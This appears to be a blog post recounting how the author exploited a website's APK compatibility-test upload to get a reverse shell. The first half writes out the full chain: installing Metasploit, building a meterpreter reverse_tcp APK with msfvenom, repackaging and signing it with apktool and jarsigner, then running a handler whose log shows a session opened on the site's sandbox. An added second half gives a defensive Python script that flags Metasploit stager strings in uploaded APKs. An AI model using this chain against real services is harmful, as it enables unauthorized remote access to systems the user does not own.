Ran into a site today with a feature that lets you upload an APK for compatibility testing. Seeing that an uploaded file gets executed, I immediately thought of uploading a payload to get a callback.
Install msf:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
Generate the payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5555 > sdf.apk
The APK msf generates won't open on newer Android versions; it has to be decompiled and rebuilt.
Download apktool:
https://ibotpeaches.github.io/Apktool/
Put it in the same directory as the payload from before. The path must not contain Chinese characters, or repackaging will fail.
Unpack:
java -jar .\apktool_2.10.0.jar d -f .\sdf.apk -o ama
Go into the ama directory and change sdkInfo in apktool.yml to the following:
sdkInfo:
  minSdkVersion: 16
  targetSdkVersion: 23
Repack:
java -jar .\apktool_2.10.0.jar b .\ama\ -o new.apk
Generate a signing certificate:
keytool -genkeypair -alias sss -keyalg RSA -validity 100 -keystore sss.jks
Sign:
jarsigner -verbose -keystore sss.jks -signedjar hhh.apk new.apk sss
Start msfconsole:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 5555
run
Run it and wait for the callback:
msf6 exploit(multi/handler) > run
[-] Handler failed to bind to xxx.xxx.xxx.xxx:50001:- -
[*] Started reverse TCP handler on 0.0.0.0:50001
[*] Sending stage (72424 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (172.28.198.158:50001 -> xxx.xxx.xxx.xxx:28082) at 2024-12-13 17:36:35 +0800
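Seen from the side of whoever runs that compatibility-test sandbox, the whole chain above only works because an arbitrary uploaded APK is installed and executed without any triage. The following is an added example, not code from the original post, of a small Python gate that can run before installation: it opens the APK as a zip, searches every classes*.dex and the binary manifest for the class-path strings that the default msfvenom Android stager leaves behind, and records which v1 signature files are present so a freshly minted self-signed key can be reviewed. The indicator strings, the helper names and the in-memory sample APKs are constructed assumptions for the example, not artefacts taken from the post.

```python
"""Triage an uploaded APK before a compatibility-test sandbox installs it.

Added example (not from the original post). Assumes a standard APK layout:
a zip containing AndroidManifest.xml, classes*.dex and META-INF/*.RSA|DSA|EC.
"""
import io
import re
import zipfile

# Assumption: class-path strings the default msfvenom android/meterpreter
# stager leaves in classes.dex. Tune this list against your own samples.
DEX_INDICATORS = [
    b"Lcom/metasploit/stage/",
    b"Lcom/metasploit/meterpreter/",
]

# The binary AndroidManifest.xml stores its string pool as UTF-16LE or UTF-8,
# so package names are checked in both encodings.
MANIFEST_INDICATORS = ["com.metasploit.stage"]


def _contains_either_encoding(blob: bytes, needle: str) -> bool:
    return needle.encode("utf-8") in blob or needle.encode("utf-16-le") in blob


def triage_apk(apk_bytes: bytes) -> dict:
    """Return findings for one APK; findings['verdict'] is 'block' or 'allow'."""
    findings = {"dex_hits": [], "manifest_hits": [], "signers": [], "reasons": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(apk_bytes))
    except zipfile.BadZipFile:
        findings["reasons"].append("not a zip/apk")
        findings["verdict"] = "block"
        return findings

    names = zf.namelist()

    # Every dex file is scanned, because multidex apps can hide code in classes2.dex etc.
    dex_names = [n for n in names if re.fullmatch(r"classes\d*\.dex", n)]
    if not dex_names:
        findings["reasons"].append("no classes.dex")
    for n in dex_names:
        blob = zf.read(n)
        for indicator in DEX_INDICATORS:
            if indicator in blob:
                findings["dex_hits"].append(indicator.decode())

    if "AndroidManifest.xml" in names:
        manifest = zf.read("AndroidManifest.xml")
        for indicator in MANIFEST_INDICATORS:
            if _contains_either_encoding(manifest, indicator):
                findings["manifest_hits"].append(indicator)
    else:
        findings["reasons"].append("no AndroidManifest.xml")

    # v1 (jarsigner) signature blocks live in META-INF/<ALIAS>.RSA|DSA|EC;
    # the alias is worth surfacing to a reviewer when it is a throwaway name.
    findings["signers"] = [
        n for n in names if re.fullmatch(r"META-INF/[^/]+\.(RSA|DSA|EC)", n, re.I)
    ]

    if findings["dex_hits"] or findings["manifest_hits"]:
        findings["reasons"].append("known stager indicator")
    findings["verdict"] = "block" if findings["reasons"] else "allow"
    return findings


def build_sample_apk(dex_payload: bytes, manifest: bytes, signer: str = "SSS") -> bytes:
    """Construct a minimal fake APK in memory (test fixture only, not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", manifest)
        zf.writestr("classes.dex", dex_payload)
        zf.writestr(f"META-INF/{signer}.RSA", b"\x30\x82")  # placeholder PKCS#7 header bytes
    return buf.getvalue()


# Constructed samples: one carrying the stager strings, one plain test app.
SUSPECT_APK = build_sample_apk(
    b"dex\n035\x00" + b"Lcom/metasploit/stage/Payload;",
    "com.metasploit.stage".encode("utf-16-le"),
)
CLEAN_APK = build_sample_apk(
    b"dex\n035\x00" + b"Lcom/example/compat/MainActivity;",
    "com.example.compat".encode("utf-16-le"),
)

if __name__ == "__main__":
    for label, apk in (("suspect", SUSPECT_APK), ("clean", CLEAN_APK)):
        print(label, triage_apk(apk))
```

In a real deployment the verdict would also feed an alert: an upload that is blocked for a stager indicator, together with the signer alias, is exactly the event a sandbox operator wants logged, and the outbound connection a stager would have made (the reverse TCP callback visible in the handler output above) is the network-side counterpart to watch for from the sandbox host.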